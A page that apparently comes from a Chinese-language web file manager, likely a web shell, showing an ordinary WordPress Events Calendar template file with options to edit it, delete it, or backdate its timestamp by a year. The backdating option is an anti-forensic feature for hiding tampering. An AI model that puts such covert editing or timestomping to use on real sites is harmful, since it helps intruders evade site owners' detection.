文件操作 - messages.php
返回文件管理
返回主菜单
删除本文件
文件: /home/www/public/wp-content/plugins/the-events-calendar/src/views/v2/components/messages.php
编辑文件内容
<?php /** * View: Messages * * Override this template in your own theme by creating a file at: * [your-theme]/tribe/events/v2/components/messages.php * * See more documentation about our views templating system. * * @link http://evnt.is/1aiy * * @version 6.12.0 * @since 6.2.0 Resolved spacing issues. * @since 6.12.0 Small tweaks for accessibility. * * @var array<string,array<string>> $messages An array of user-facing messages, managed by the View. * @var array<string,mixed> $attributes A optional map of attributes that should be applied to the wrapper div element. * @var string $wp_version Global WP version. * * @package the-events-calendar/views/v2 */ if ( empty( $messages ) ) { return; } global $wp_version; $default_classes = [ 'tribe-events-header__messages', 'tribe-events-c-messages', 'tribe-common-b2' ]; $classes = isset( $classes ) ? array_merge( $default_classes, $classes ) : $default_classes; $attributes = isset( $attributes ) ? (array) $attributes : []; ?> <div <?php tec_classes( $classes ); ?> <?php tribe_attributes( $attributes ); ?>> <?php foreach ( $messages as $message_type => $message_group ) : ?> <div class="tribe-events-c-messages__message tribe-events-c-messages__message--<?php echo esc_attr( $message_type ); ?>" tabindex="0" role="alert" aria-live="assertive"> <?php $this->template( 'components/messages/' . esc_attr( $message_type ) . '-icon' ); ?> <?php foreach ( $message_group as $key => $message ) : ?> <div <?php tribe_attributes( [ 'data-key' => esc_attr( (string) $key ) ] ); ?>> <?php echo version_compare( $wp_version, '5.0', '>=' ) ? wp_kses_post( $message ) : esc_html( $message ); ?> </div> <?php endforeach; ?> </div> <?php endforeach; ?> </div>
修改文件时间
将文件时间修改为当前时间的前一年
删除文件